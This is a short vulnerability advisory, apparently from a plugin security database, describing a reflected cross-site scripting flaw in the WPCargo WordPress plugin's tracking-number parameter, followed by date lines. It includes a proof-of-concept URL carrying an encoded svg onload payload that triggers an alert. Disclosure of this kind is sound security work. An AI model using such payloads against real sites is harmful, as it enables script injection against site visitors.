The plugin does not sanitise and escape the wpcargo_tracking_number parameter before outputting it back in the page, which could allow attackers to perform reflected Cross-Site Scripting attacks.
On a page using the [wpcargo_trackform] shortcode, append the following parameter and payload: wpcargo_tracking_number=%22%3E%3Csvg/onload=alert(/xss/)%3E e.g: https://example.com/page-with-shortcode/?wpcargo_tracking_number=%22%3E%3Csvg/onload=alert(/xss/)%3E
2022-04-25 (about 1 years ago)
2022-04-25 (about 1 years ago)
2023-02-05 (about 3 months ago)